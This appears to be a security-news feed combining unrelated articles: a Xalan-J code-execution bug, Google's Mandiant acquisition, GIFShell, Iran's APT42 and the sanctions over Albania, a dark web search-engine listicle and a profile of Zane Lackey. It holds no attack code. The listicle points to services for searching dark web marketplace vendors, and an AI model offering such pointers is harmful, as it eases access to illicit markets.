Open source project is used by various SAML implementations

Jessica Haworth 12 September 2022 at 14:46 UTC

Open source project is used by various SAML implementations

  

A vulnerability in Xalan-J, an Apache project used by multiple SAML implementations, could allow arbitrary code execution, researchers warn.

XSLT (Extensible Stylesheet Language Transformations) is a markup language that can transform XML documents into other formats, such as HTML.

Xalan-J is a Java version implementation of an XSLT processor.

The project is vulnerable to an integer truncation issue when processing malicious XSLT stylesheets, discovered by Google Project Zero’s Felix Wilhelm.

Read more of the latest news about web security vulnerabilities

This issue can be used to corrupt Java class files generated by the internal XSLTC compiler and execute arbitrary Java bytecode, he warned, allowing for arbitrary code execution in software using Xalan-J for processing untrusted XSLT stylesheets.

As Xalan-J is used for performing XSLT transformations during XML signature verification in OpenJDK, this bug potentially affects a large number of Java-based SAML implementations, Wilhelm warned.

SAML is a method of authentication that enables a user to access multiple web applications using one set of login credentials.

**Mitigations**

The researcher noted that XSLT support for XML signatures can be disabled using the property, however the default value for applications running without a SecurityManager was false until JDK 17, “so I would expect a lot of implementations to be vulnerable to this”.

In a blog post published in August, Wilhelm said that he was able to write a Proof-of-Concept (PoC) exploit for this bug “that generates a valid (but useless) class file that’s almost completely controlled by the attacker”.

He continued: “While I haven’t successfully executed my own bytecode yet I’m very confident that this is possible with a bit more time investment, so I am reporting this issue now and may follow-up with a more complete proof-of-concept at a later stage.”

Another researcher has since produced their own PoC for the vulnerability, more details of which can be found on GitHub.

The vulnerability has since been fixed in OpenJDK, the open source implementation of the Java Standard Edition (Java SE) and Java Development Kit (JDK).

Wilhelm notes that it has not been fixed in Apache’s version, which is being retired.

RECOMMENDED ManageEngine vulnerability posed code injection risk for password management software

Vulnerability in Xalan-J could allow arbitrary code execution

The threat-intelligence and cyberdefense company company will join Google Cloud and retain its brand name.

**MOUNTAIN VIEW, Calif., and RESTON, Va., Sept. 12, 2022 /PRNewswire/** — Google LLC today announced the completion of its acquisition of Mandiant Inc. (NASDAQ: MNDT), a recognized leader in dynamic cyberdefense, threat intelligence and incident-response services. Mandiant will join Google Cloud and retain the Mandiant brand.

Google and Mandiant share a long commitment to industry-leading security. Over the past two decades, Google has innovated to build some of the most secure computing systems in the world. Google Cloud customers and partners benefit from these pioneering security capabilities, including world-class threat intelligence, zero trust architecture, and planet-scale analytics for security operations. Mandiant, which is known for delivering unparalleled frontline expertise and industry-leading threat intelligence, is a proven first responder to the world's largest cybersecurity incidents. Mandiant's services, delivered by their team of security and intelligence individuals spread across 22 countries, are widely recognized for helping top enterprises and organizations prepare for and react to cybersecurity incidents.

With this acquisition, Google Cloud and Mandiant will deliver an end-to-end security operations suite with even greater capabilities to support customers across their cloud and on-premise environments.

"The completion of this acquisition will enable us to deliver a comprehensive and best-in-class cybersecurity solution," said Thomas Kurian, CEO of Google Cloud. "We believe this acquisition creates incredible value for our customers and the security industry at large. Together, Google Cloud and Mandiant will help reinvent how organizations protect themselves, as well as detect and respond to threats."

Organizations today are facing cybersecurity challenges that have accelerated in frequency, severity and diversity, creating a global security imperative. Enterprises need to be able to detect and respond to malicious actors quickly, with actionable threat intelligence to continually protect their organizations against new attacks.

"Mandiant is driven by a mission to make every organization secure from cyber threats and confident in their readiness," said Kevin Mandia, CEO, Mandiant. "Combining our 18 years of threat intelligence and incident response experience with Google Cloud's security expertise presents an incredible opportunity to deliver with the speed and scale that the security industry needs."

Hear from others on the impact of this acquisition:

*   "The power of stronger partnerships across the cybersecurity ecosystem is critical to driving value for clients and protecting industries around the globe. The combination of Google Cloud and Mandiant and their commitment to multi-cloud will further support increased collaboration, driving innovation across the cybersecurity industry and augmenting threat research capabilities. We look forward to working with them on this mission." — Paolo Dal Cin, Global Lead, Accenture Security
*   "Google's acquisition of Mandiant, a leader in threat intelligence, security advisory, consulting and incident response services will allow Google Cloud to deliver an end-to-end security operations suite with even greater capabilities and services to support customers in their security transformation across cloud and on-premise environments." — Craig Robinson, Research VP, Security Services, IDC
*   "Bringing together Mandiant and Google Cloud, two long-time cybersecurity leaders, will advance how companies identify and defend against threats. We look forward to the impact of this acquisition, both for the security industry and the protection of our customers." — Andy Schworer, Director, Cyber Defense Engineering, Uber

For more information, see the Google Cloud blog and Mandiant blog.

**About Google  
**Google's mission is to organize the world's information and make it universally accessible and useful. Through products and platforms like Search, Maps, Gmail, Android, Google Play, Chrome and YouTube, Google plays a meaningful role in the daily lives of billions of people and has become one of the most widely known companies in the world. Google is a subsidiary of Alphabet Inc.

**About Google Cloud  
**Google Cloud accelerates every organization's ability to digitally transform its business. We deliver enterprise-grade solutions that leverage Google's cutting-edge technology — all on the cleanest cloud in the industry. Customers in more than 200 countries and territories turn to Google Cloud as their trusted partner to enable growth and solve their most critical business problems.

**About Mandiant, Inc.  
**Since 2004, Mandiant has been a trusted partner to security-conscious organizations. Effective security is based on the right combination of expertise, intelligence, and adaptive technology, and the Mandiant Advantage SaaS platform scales decades of frontline experience and industry-leading threat intelligence to deliver a range of dynamic cyber defense solutions. Mandiant's approach helps organizations develop more effective and efficient cyber security programs and instills confidence in their readiness to defend against and respond to cyber threats.

**Forward-Looking Statements  
**This release includes forward-looking statements within the meaning of Section 27A of the Securities Act of 1933 and Section 21E of the Securities Exchange Act of 1934. These forward-looking statements involve certain risks and uncertainties that could cause actual results to differ materially from those indicated in such forward-looking statements, including but not limited to the ability of Google to successfully integrate Mandiant's operations, product lines and technology; the ability of Google to implement its plans, forecasts and other expectations with respect to Mandiant's business after the completion of the transaction and realize additional opportunities for growth and innovation; and the other risks and important factors contained and identified in Alphabet's filings with the Securities and Exchange Commission, any of which could cause actual results to differ materially from the forward-looking statements. The forward-looking statements included in this release are made only as of the date hereof. Google and Alphabet undertake no obligation to update the forward-looking statements to reflect subsequent events or circumstances.

SOURCE: Google Inc.

Google Completes Acquisition of Mandiant

Users must continually be made aware of new threats, including attacks targeting shipping, the supply chain, email, and hybrid workers.

Digital transformation has accelerated during the past couple years, and so, too, have security threats. With more employees working remotely, more customers buying through mobile and social channels, and more retailers expanding their supply chains to keep inventory in stock, criminals have more ways than ever to go after e-commerce businesses.

Meanwhile, security awareness training may not be keeping up. It's a good time to review your organization's awareness program and adjust reflect the current threat landscape. Here's how retailers can update their awareness training and practices to match their digital transformation progress.

**A Dramatic Increase in Shipping Fraud**

While most retailers understandably focus on fraud at the payment stage of the customer journey, shipping fraud should also be considered. In fact, shipping fraud is the fastest-growing type of fraud worldwide, according to TransUnion's "2022 Global Digital Fraud Trends" report. Shipping fraud grew by 780% from 2020 to 2021, and by 1,541% from 2019 through 2021, according to the report. Shipping fraud can lead to chargebacks, inventory losses, and brand damage just as card-not-present (CNP) and account takeover (ATO) fraud do.

"Shipping fraud" is an umbrella term that covers several tactics that criminals use to exploit the e-commerce shipping process. Different approaches can target different areas of your business, so it's important to expand shipping fraud awareness across your organization rather than solely training your fraud team on this threat.

For example, your customer service and fulfillment teams should be aware of how package rerouting scams operate. Fraudsters place orders with stolen payment data or hijacked customer accounts and use the victim's real delivery address so the order doesn't get flagged as suspicious. After the order is approved, fraudsters contact customer service and request a delivery address change, claiming they made a mistake.

While honoring such a request may seem like good customer service, it could be exposing your company to fraud. One solution that can satisfy legitimate customer requests while avoiding fraud is to cancel the original transaction and run it again with the updated delivery address. If it's approved, customers get their purchases directed to the right address. If it's not, your company has avoided a case of shipping fraud.

**Expanding Supply Chains, More Email Attack Risk**

Other security risks aren't necessarily coming in through your website or shopping app, but they can imperil your brand, your business operations, and your customers. A prime example is email phishing attacks, which increased against e-commerce businesses by 53.9% from 2019 through 2021, according to the TransUnion report.

One reason for the current email phishing surge is the rapid expansion of supply chains since the start of the pandemic, as retailers made new connections to avoid running out of stock and disruptions. Another is the increasing reliance on email for customer interactions since early 2020: Online interactions now make up 61% of all customer engagements with companies, according to Salesforce's "State of the Connected Customer" report. The addition of more contacts to the email ecosystem and the higher volume of email traffic provides criminals with more opportunities to launch email attacks.

A subset of business email compromise (BEC) is vendor email compromise, and it's a growing problem. In a vendor email compromise scheme, attackers impersonate trusted third parties such as suppliers and vendors to trick employees into paying fraudulent invoices, entering login credentials, or sharing proprietary data. According to a report from email security firm Abnormal, more than half of all BEC attacks now impersonate third parties. As a result, all employees need to be aware that when emails from trusted senders, including suppliers and vendors, contain requests that seem unusual, they should flag those messages for the security team to review before responding.

**Attackers Exploit Remote and Hybrid Workforce Trends**

Ransomware and other forms of malware are a perennial problem for retailers, especially malware that steals customer payment data. Verizon's "2022 Data Breach Investigations Report" found that the retail industry suffered seven times as many instances of "capture app data" malware than other industry. These Magecart-style attacks can silently scrape data as it's entered, going undetected until fraud complaints start coming in. To prevent them, everyone who works with your website needs to be aware of the potential for this type of malware and the processes for scanning, removal, and remediation.

Another growing opportunity for malware attackers is retailers' shift to remote or hybrid workforces. As employees log in remotely more often — and more often from personal rather than company devices — fraudsters have seized the opportunity to create realistic-looking login request emails that can appear to come from your company's cloud services, such as Google Drive or Microsoft SharePoint. All employees and executives need to be aware of the risk that unexpected or slightly unusual login request messages can pose. Like unusual vendor messages, these should be reported to the security team for review before replying.

These trends illustrate why it's important for security awareness to be a process rather than a one-time discussion. This year, your people need to be aware of shipping fraud, vendor email compromise, and credential phishing attacks posing as company resource providers. Next year, it will likely be something else. By having regular discussions about these security issues and encouraging a data-safety mindset, you can reduce the risk of today's threats and create a culture of security that benefits your company over the long term.

Security Awareness Training Must Evolve to Align With Growing E-Commerce Security Threats

By Deeba Ahmed
Dubbed GIFShell; the technique allows attackers to create a reverse shell to facilitate malicious command delivery via base64-encoded GIFs in MS Teams.
This is a post from HackRead.com Read the original post: Scammers Leveraging Microsoft Team GIFs in Phishing Attacks

Cybersecurity consultant Bobby Rauch has discovered a new attack tactic in which threat actors exploit **Microsoft Teams vulnerabilities**. According to Rauch, attackers can easily leverage Microsoft Teams GIFs through these vulnerabilities to launch phishing, command execution, and data filtration schemes.

**What is GIFShell?**

Rauch has named the newly discovered attack technique involving MS Teams GIFs as GIFShell. The technique allows attackers to create a reverse shell to facilitate malicious command delivery via base64-encoded GIFs in MS Teams.

Using a malicious stager executable, the attackers can establish their dedicated MS Teams tenant and start the attack using the GIFShell Python script.

GIFShell installs malware on the device and can sneakily extract data under the guise of harmless GIF images. Rauch noted that the attack entails the exploitation of multiple vulnerabilities in MS Teams to create a chain of command executions.

Furthermore, attackers only need to infiltrate MS Teams and any of the **GIFs**. Utilizing Microsoft’s web infrastructure, they can unpack commands and install them directly on computers.

1.  **Hackers are using Microsoft Teams chat to spread malware**
2.  **Microsoft Office Most Exploited Software in Malware Attacks – Report**
3.  **Hacker disrupts Emotet botnet operation by replacing payload with GIFs**
4.  **Malware spread through images taken by James Webb Space Telescope**
5.  **Fake Zoom meeting invitation phishing scam harvests Microsoft credentials**

**Microsoft’s Response**

In a **blog post**, Rauch stated that he notified Microsoft in May 2022. However, Microsoft claims that immediately releasing fixes for the attack is impossible. Moreover, the tech giant stated that the attack techniques “reported” by Rauch don’t meet the requisites for developing an urgent security fix.

> “We’re constantly looking at new ways to better resist phishing to help ensure customer security and may take action in a future release to help mitigate this technique.”
> 
> Microsoft

Therefore, the best line of defense for you is not to open any GIFs shared by someone on MS Teams.

**More News**

1.  **Microsoft bars Tutanota users from registering MS Teams accounts**
2.  **Google, Microsoft and Oracle generated most vulnerabilities in 2021**
3.  **Researchers Warn of New Microsoft Office 0-Day Vulnerability “Follina”**
4.  **Nitrokod Crypto Miner Hiding in Fake Microsoft and Google Translate Apps**
5.  **What Are the Top 10 Android Educational Apps That Collect Most User Data?**

Scammers Leveraging Microsoft Team GIFs in Phishing Attacks

A state-sponsored advanced persistent threat (APT) actor newly christened APT42 (formerly UNC788) has been attributed to over 30 confirmed espionage attacks against individuals and organizations of strategic interest to the Iranian government at least since 2015.
Cybersecurity firm Mandiant said the group operates as the intelligence gathering arm of Iran's Islamic Revolutionary Guard Corps (

A state-sponsored advanced persistent threat (APT) actor newly christened APT42 (formerly UNC788) has been attributed to over 30 confirmed espionage attacks against individuals and organizations of strategic interest to the Iranian government at least since 2015.

Cybersecurity firm Mandiant said the group operates as the intelligence gathering arm of Iran's Islamic Revolutionary Guard Corps (IRGC), not to mention shares partial overlaps with another cluster called APT35, which is also known as Charming Kitten, Cobalt Illusion, ITG18, Phosphorus, TA453, and Yellow Garuda.

APT42 has exhibited a propensity to strike various industries such as non-profits, education, governments, healthcare, legal, manufacturing, media, and pharmaceuticals spanning at least 14 countries, including in Australia, Europe, the Middle East, and the U.S.

Intrusions aimed at the pharmaceutical sector are also notable for the fact that they commenced at the onset of the COVID-19 pandemic in March 2020, indicating the threat actor's ability to swiftly modify its campaigns in order to meet its operational priorities.

"APT42 uses highly targeted spear-phishing and social engineering techniques designed to build trust and rapport with their victims in order to access their personal or corporate email accounts or to install Android malware on their mobile devices," Mandiant said in a report.

The goal is to exploit the fraudulent trust relationships to steal credentials, enabling the threat actor to leverage the access to conduct follow-on compromises of corporate networks to gather sensitive data and use the breached accounts to phish additional victims.

Attack chains involve a mix of highly targeted spear-phishing messages aimed at individuals and organizations of strategic interest to Iran. They are also conceived with the intent to build trust with former government officials, journalists, policymakers, and the Iranian diaspora abroad in hopes of distributing malware.

Outside of using hacked email accounts associated with think tanks to target researchers and other academic organizations, APT42 is often known to impersonate journalists and other professionals to engage with the victims for several days or even weeks before sending a malicious link.

In one attack observed in May 2017, the group targeted members of an Iranian opposition group operating from Europe and North America with email messages that contained links to rogue Google Books pages, which redirected victims to sign-in pages designed to siphon credentials and two-factor authentication codes.

Surveillance operations involve the distribution of Android malware such as VINETHORN and PINEFLOWER via text messages that are capable of recording audio and phone calls, extracting multimedia content and SMSes, and tracking geolocations. A VINETHORN payload spotted between April and October 2021 masqueraded as a VPN app called SaferVPN.

"The use of Android malware to target individuals of interest to the Iranian government provides APT42 with a productive method of obtaining sensitive information on targets, including movement, contacts, and personal information," the researchers noted.

The group is also said to use a raft of lightweight Windows malware from time to time – a PowerShell toehold backdoor named TAMECAT, a VBA-based macro dropper dubbed TABBYCAT, and a reverse shell macro known as VBREVSHELL – to augment their credential harvesting and espionage activities.

APT42's links to APT35 stems from links to an uncategorized threat cluster tracked as UNC2448, which Microsoft (DEV-0270) and Secureworks (Cobalt Mirage) disclosed as a Phosphorus subgroup carrying out ransomware attacks for financial gain using BitLocker.

Mandiant's analysis further lends credence to Microsoft's findings that DEV-0270/UNC2448 is operated by a front company that uses two public aliases, namely Secnerd and Lifeweb, both of which are connected to Najee Technology Hooshmand.

That having said, it's suspected the two adversarial collectives, despite their affiliation with IRGC, originate from disparate missions based on differences in targeting patterns and the tactics employed.

A key point of distinction is that while APT35 is oriented towards long-term, resource-intensive operations targeting different industry verticals in the U.S. and the Middle East, APT42's activities focus on individuals and entities for "domestic politics, foreign policy, and regime stability purposes."

"The group has displayed its ability to rapidly alter its operational focus as Iran's priorities change over time with evolving domestic and geopolitical conditions," the researchers said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Iranian APT42 Launched Over 30 Espionage Attacks Against Activists and Dissidents

The U.S. Treasury Department on Friday announced sanctions against Iran's Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence, Esmaeil Khatib, for engaging in cyber-enabled activities against the nation and its allies.
"Since at least 2007, the MOIS and its cyber actor proxies have conducted malicious cyber operations targeting a range of government and private-sector

The U.S. Treasury Department on Friday announced sanctions against Iran's Ministry of Intelligence and Security (MOIS) and its Minister of Intelligence, Esmaeil Khatib, for engaging in cyber-enabled activities against the nation and its allies.

"Since at least 2007, the MOIS and its cyber actor proxies have conducted malicious cyber operations targeting a range of government and private-sector organizations around the world and across various critical infrastructure sectors," the Treasury said.

The agency also accused Iranian state-sponsored actors of staging disruptive attacks aimed at Albanian government computer systems in mid-July 2022, forcing it to suspend its online services.

The development comes months nearly nine months after the U.S. Cyber Command characterized the advanced persistent threat (APT) known as MuddyWater as a subordinate element within MOIS. It also comes almost two years following the Treasury's sanctions against another Iranian APT group dubbed APT39 (aka Chafer or Radio Serpens).

Friday's sanctions effectively prohibit U.S. businesses and citizens from engaging in transactions with MOIS and Khatib, and non-U.S. citizens that engage in transactions with the designated entities may themselves be exposed to sanctions.

Coinciding with the economic blockade, the Albanian government said the cyberattack on the digital infrastructure was "orchestrated and sponsored by the Islamic Republic of Iran through the engagement of four groups that enacted the aggression."

Microsoft, which investigated the attacks, said the adversaries worked in tandem to carry out distinct phases of the attacks, with each cluster responsible for a different aspect of the operation -

*   DEV-0842 deployed the ransomware and wiper malware
*   DEV-0861 gained initial access and exfiltrated data
*   DEV-0166 (aka IntrudingDivisor) exfiltrated data, and
*   DEV-0133 (aka Lyceum or Siamese Kitten) probed victim infrastructure

The tech giant's threat intelligence teams also attributed the groups involved in gaining initial access and exfiltrating data to the Iranian MOIS-linked hacking collective codenamed Europium, which is also known as APT34, Cobalt Gypsy, Helix Kitten, or OilRig.

"The attackers responsible for the intrusion and exfiltration of data used tools previously used by other known Iranian attackers," it said in a technical deepdive. "The attackers responsible for the intrusion and exfiltration of data targeted other sectors and countries that are consistent with Iranian interests."

"The Iranian sponsored attempt at destruction had less than a 10% total impact on the customer environment," the company noted, adding the post-exploitation actions involved the use of web shells for persistence, unknown executables for reconnaissance, credential harvesting techniques, and defense evasion methods to turn off security products.

Microsoft's findings dovetail with previous analysis from Google's Mandiant, which called the politically motivated activity a "geographic expansion of Iranian disruptive cyber operations."

Initial access to the network of an Albanian government victim is said to have occurred as early as May 2021 via successful exploitation of a SharePoint remote code execution flaw (CVE-2019-0604), followed by exfiltration of email from the compromised network between October 2021 and January 2022.

A second, parallel wave of email harvesting was observed between November 2021 and May 2022, likely through a tool called Jason. On top of that, the intrusions entailed the deployment of ransomware called ROADSWEEP, eventually leading to the distribution of a wiper malware referred to as ZeroCleare.

Microsoft characterized the destructive campaign as a "form of direct and proportional retaliation" for a string of cyberattacks on Iran, including one staged by an Iranian hacktivist group that's affiliated to Mujahedin-e-Khalq (MEK) in the first week of July 2022.

The MEK, also known as the People's Mujahedin Organization of Iran (PMOI), is an Iranian dissident group largely based in Albania that seeks to overthrow the government of the Islamic Republic of Iran and install its own government.

"Some of the Albanian organizations targeted in the destructive attack were the equivalent organizations and government agencies in Iran that experienced prior cyberattacks with MEK-related messaging," the Windows maker said.

Iran's Foreign Ministry, however, has rejected accusations that the country was behind the digital offensive on Albania, calling them "baseless" and that it's "part of responsible international efforts to deal with the threat of cyberattacks."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

U.S. Imposes New Sanctions on Iran Over Cyberattack on Albania

By Waqas
When it comes to the best dark web search engines, first and foremost, you want a search engine that is private and secure, as well as one that can be used anonymously.
This is a post from HackRead.com Read the original post: 8 Online Best Dark Web Search Engines for Tor Browser (2022)

The **Dark Web**, also known as the Dark Net, is a part of the Internet that is not accessible through standard web browsers. It can only be accessed through specialized software such as the Tor browser.

The Dark Web is often associated with illegal activity such as cybercrime including drug dealing, child abuse, and terrorism. However, there are also many legitimate uses for the Dark Web, such as anonymity for whistleblowers and journalists. **Facebook** and **Twitter** also have their dark web domains. (_If you didn’t know now you know_).

Despite its reputation, the Dark Web is a relatively small part of the overall Internet. It is estimated that only around 4% of all websites are accessible through the **Tor browser**.

**What is a Tor Browser?**

The Tor Browser is a free and open-source web browser that is based on the Mozilla Firefox web browser. The Tor Browser is designed to protect your privacy and anonymity when using the internet.

The Tor Browser routes your internet traffic through a network of servers, making it difficult for anyone to track your online activity. The Tor Browser is available for Windows, macOS, and Linux.

Tor is short for “The Onion Router”. The Tor network was **originally developed** by the US Naval Research Laboratory as a way to securely communicate between government agencies.

The Tor network consists of a series of volunteer-run servers that route internet traffic through a series of encrypted tunnels. This makes it difficult for anyone to track your online activity or identify your location.

**How to Download Tor Browser?**

The Tor Browser, as we know it, is available for Windows, macOS, Linux, and Android. To download the Tor Browser, visit the official website at **Torproject.org**. Once you’re on the website, click “Download Tor Browser.” Then, select the appropriate version for your operating system and follow the prompts to complete the installation.

Once you have the Tor Browser installed, launch it and click “Connect.” That’s it! You’re now browsing anonymously. Keep in mind that because Tor encrypts your traffic, your internet speeds may be slower than usual. But rest assured that your privacy and security are well worth the trade-off.

**You May Also Like**

1.  **What Are Dark Web Search Engines and How to Find Them?**
2.  **Brave Browser enters dark web with its own Tor Onion service**
3.  **Online Anonymity – How to Keep Yourself Safe and Unidentified**
4.  **Why torrenting on Elon Musk’s Starlink Internet is not a good idea?**
5.  **USA Wants Russians to Share Secret Info with the CIA on the Dark Web**

**Best Dark Web Search Engines for Tor Browser**

When it comes to the best dark web search engines, there are a few things to keep in mind. First and foremost, you want a search engine that is private and secure, as well as one that can be used anonymously.

Additionally, you want a search engine that is fast and efficient, so you can get the information you need without any delays. Assuming those are your priorities, here are 8 dark web search engines to use with Tor Browser:

**1\. Ahmia.fi**

Ahmia.fi is a search engine designed to allow access to the so-called “dark web” or “dark net” – a hidden part of the internet that can only be accessed using specific software, such as the Tor browser.

Ahmia is one of a small number of dark web search engines that allow users to access the dark web, and it has been praised for making this otherwise hidden part of the internet more accessible.

However, Ahmia also has a policy against any “abuse material,” something different from many other dark web search engines that also index websites featuring child sexual abuse content.

Ahmia is available on the **surface web** and supports searches on the i2p network as well. You can visit Ahmia’s .Onion domain **here**. 

Home page of Ahmia dark web search engine

**2\. Haystak**

Haystak is one of the dark web search engines designed for the Tor network. The search engine claims to have indexed over 1.5 billion pages which includes more than 260,000 websites, Haystak indeed would stand out to be a resourceful engine on the list.

Haystak also has a paid version which offers a number of additional features such as searching using regular expressions, browsing now-defunct onion sites, and accessing their API. You can visit Haystak by following its .Onion link **here**. 

Home page of Haystak dark web search engine

**3\. The Hidden Wiki**

The Hidden Wiki is a dark web directory that can only be accessed using the Tor network. The site contains links to a variety of different websites. The Hidden Wiki is a valuable resource for those who wish to explore the dark web, as it provides a safe and easy way to access a variety of different sites.

A **surface web version** is also available. You can visit The Hidden Wiki by following its .Onion link **here**. 

Home page of The Hidden Wiki

**4\. Torch**

Torch is one of those dark web search engines that have lasted for long enough (since 1996). Torch, like other search engines, crawls these addresses and indexes their content, making it searchable for users.

However, speaking based on personal experience, its search results are not impressive. For instance, I wanted to know Twitter’s onion URL, a very simple piece of information. Yet, it reported everything but that showing how far these search engines have to go in order to improve.

On the other hand, it is fast and can come in handy regardless. Nevertheless, you can visit Torch by following its .Onion link **here**. 

Home page of Torch dark web search engine

**5\. Recon**

This particular search engine was built by Hugbunt3r, a prominent member of the popular **Dread service** on the dark web. It aims to serve as a database through which users can search for products from different vendors in different marketplaces on the dark web.

Individual profile viewing options for vendors & marketplaces are also available including details like ratings, mirror links, number of listings, and uptime percentage. You can visit Recon by following its .Onion link **here** and just in case you manage to bypass its DDoS protection captcha page let us know in the comment section because we failed to do so. (_Good luck_).

Home page of Recon dark web search engine

**6\. DuckDuckGo**

Did you know DuckDuckGo is available on the dark web and they have their .Onion domain as well? Yes, but it only displays results from the surface web even if used on the Tor browser.

Yet, when it comes to anonymity DuckDuckGo has a proven track record which is why the privacy advocate team behind DDG is known as a long-time foe of Google. You can visit DuckDuckGo by visiting its .Onion link **here**. 

Home page of DuckDuckGo dark web search engine

**7\. Onion Search**

Onion Search is a search engine for the dark web that enables users to find and access Onion sites. The site is designed to be used with the Tor browser, which allows users to browse the internet anonymously.

A look at its about page reveals that the search engine is being operated from France as the search engine acknowledges to be “fully compliant with the Law of France.” Another noteworthy option on the search engines is that one can report child abuse content to the administrator who vows to remove it.

Onion Search is available on the **clear net** as well as on the dark web through its **.Onion domain**.

Home page of Onion Search dark web search engine

**8\. Deep Search**

Deep Search is a search engine for the dark web. It is designed to index and search onionspace, the hidden services portion of the Tor network. DeepSearch is open source and available for anyone to use.

According to my personal experience, Deep Search seems to provide pretty accurate and useful results, unlike others who spam users with spam links. Another noteworthy feature of Deep Search is that it provides a list of marketplaces, exchanges, and websites involved in scamming users.

If you want to give Deep Search a try check their .Onion domain **here**.

Home page of Deep Search dark web search engine

To conclude, you may also find the links of other dark web search engines but these happen to be the ones that stand out the most.

**How to Download Tor Browser?**

The Tor Browser, as we know it, is available for Windows, macOS, Linux, and Android. To download the Tor Browser, visit the official website at **Torproject.org**. Once you’re on the website, click “Download Tor Browser.” Then, select the appropriate version for your operating system and follow the prompts to complete the installation.

Once you have the Tor Browser installed, launch it and click “Connect.” That’s it! You’re now browsing anonymously. Keep in mind that because Tor encrypts your traffic, your internet speeds may be slower than usual. But rest assured that your privacy and security are well worth the trade-off.

**What NOT TO DO on Dark Web?**

The dark web is a place full of potential danger. There are many things that can go wrong when visiting the dark web, and it’s important to be aware of them before you go. Here are some things to avoid doing on the dark web:

*   Don’t click on any links unless you know where they lead. Many links on the dark web lead to illegal drug markets, child abuse content, malicious sites, or downloads.

*   Never enter your personal information into any form on the dark web. This includes your name, address, email, and phone number.

*   Don’t download anything from the dark web unless you trust the source. There are many viruses and malware lurking on the dark web, waiting to be downloaded by unsuspecting users.

*   Never ever download illegal and abusive content that includes content against children, torture, blackmail, and other malicious content.

**Use a VPN**

Although the Tor browser protects your online privacy using a **reliable VPN** at the same time is a plus. A VPN will encrypt your traffic and hide your IP address, making it much harder for someone to track you down. Additionally, if you are on a clear net, a VPN will give you access to blocked websites and content.

1.  **Tor Anonymity: Things NOT To Do While Using Tor**
2.  **CISA Publishes List of Free Cybersecurity Tools and Services**
3.  **New Underactor tool reveals pixelated text to expose sensitive data**
4.  **Download Kali Linux 2022.1 with new tools and wider SSH compatibility**
5.  **Cybersecurity, Big Data, Automation Tools: What Marketers Need To Know**

8 Online Best Dark Web Search Engines for Tor Browser (2022)

Security Pro File: The DevOps evangelist and angel investor shares his expertise with the next generation of startups. If you're lucky, maybe he'll even share his Lagavulin.

It was only a few years ago, around 2016 or '17, that Zane Lackey had a conversation that encapsulated the challenge of his life. Then a founding adviser at Signal Sciences, he was meeting with the CISO and CIO of a certain Fortune 500 client (he won't say which). 

He met with the CISO first. Lackey suggested a cloud migration, but the man refused to budge. "I'm not allowing any of that," Lackey remembers him saying. "It's all insecure."

Lackey's second meeting of the day was with the CIO, who informed him that cloud migration was "our No. 1 priority." Lackey must have given the man a strange look because he laughed. "I see you've been talking to the CISO," the CIO said. "We just don't invite him to meetings anymore."

Lackey, former CISO and general partner at Andreessen Horowitz (a16z) since March, is one of the foremost champions of DevOps, the integration of a company's code-writing and code-deploying teams. "The teams have different priorities," he tells Dark Reading, "but they form a Venn diagram. Solutions have to help everybody, in security and everything else."

The greatest obstacle to the kind of architectures Lackey lives for has nothing to do with code or obsolete firewalls: It's the culture of siloed security and operations teams, ignoring each other's processes, or, like the Fortune 500 officers that day, actively subverting each other.

In his words, "Technology is the easy bit. Culture is the hard bit."

**The Early Years**

The ancient feuds and impenetrable silos of digital business teams must be a particular headache to someone like Lackey, who never outgrew his boyhood joy in attacking tech problems. Lackey grew up in Murphys, Calif., a tiny village without much in the way of mental stimulation. Lackey discovered PCs in his early teens and began saving money for a new hard drive to learn Linux. It was hard, lonely work, and he loved it. It took him months to figure out the PPP settings to connect to his local ISP. But once he was on, it took only five minutes for someone to hack him and shut him down.

"It was a moment that changed my life," he says, "in an extraordinarily positive way." 

Security infrastructure became Lackey's obsession. He began spending nights playing virtual "capture the flag" with his friends, devouring Red Hat, Windows, and every systems manual he could find. The passion for infrastructure and offense-defense security took Lackey to UC Davis, that improbable cradle of geniuses, where he worked as an intern in the computer security lab (a rarity in the early 2000s, even at big universities). 

At one point he had to develop a honeytrap, and so he created an entire, fake departmental website to lure in hackers. A group of South American teenagers took the bait and installed their own Counter Strike server. He describes the event today as if it were a rugby match: all give and take, high pressure and clever footwork.

His first job out of Davis came from a 2005 Craigslist ad: A Bay Area startup called iSEC Partners was looking for its first employee. Lackey started immediately, working as a general consultant under the direction of Alex Stamos. His work involved a lot of app, wireless, and network pen testing and assessment.

Then in 2010 the NCC Group bought iSEC Partners, and Lackey went to New York to start an East Coast branch. It was there, around 2011, that Lackey began exploring the tools and tactics that would come to be known as DevOps. Companies were growing faster than their linear waterfall deployments could handle. Cloud storage and bespoke, integrated tool chains had only just bridged the gap of concept and code.

But Lackey was on the case, especially after Etsy took on the 26-year-old, briefly as a consultant and then as CISO. It wasn't exactly a gamble on the company's part, at least as Lackey tells it; his credentials spoke for themselves. Etsy gave Lackey his first real taste of the colossal volume of modern, international security upkeep. At iSEC, Lackey had deployed a pen test once every 18 months. At Etsy, he was expected to deploy 30 times _per day_.

"This was security," he says, "but for a different world." (Etsy was ahead of the pack — at the time, Google and Facebook were deploying once a week.)

That different world brought its own new tools, not only at Etsy but at its mirror company on the West Coast, Netflix, where another iSEC veteran, Jason Chan, was now CISO. Like Chan, Lackey saw that reliance on thousands of discrete Web application firewalls (WAFs) could never keep pace with the modern volume of threats. The cloud transition was part of the solution, as was a more nuanced zero-trust strategy than was common, then or now. 

But what companies like Etsy needed was a new architecture altogether, where each individual application fits into a companywide, vertically integrated security system like teeth in a zipper, accessible through one "single pane of glass" console. The console would have to be completely visible across teams, never "someone else's job" (in or out of the company), and, most importantly, scalable. That's where DevOps came in.

Businesses grow at different speeds; the point of DevOps is to keep their security operations moving at exactly the speed they need. Lackey says that scale is the foremost problem facing every security team, and that "if you have to be a security expert to use a security tool, \[the tool\] doesn't scale."

**Changing Up His Game**

In 2014, Lackey left Etsy with two of his colleagues to form Signal Sciences, a venture-backed Web app and API security startup. Signal Sciences blew up (in a good way): At the peak of Lackey's tenure as board member and CSO, the company had 150 employees, $28 million in annual recurring revenue, and outlets like Forbes and Gartner piled on accolades.

Lackey then found himself on the other side of the table, advising the Fortune 500 companies and, increasingly, investing in new firms. "I enjoy adapting," he says, with the same relish that comes through in his tales of early 2000s hacking games.

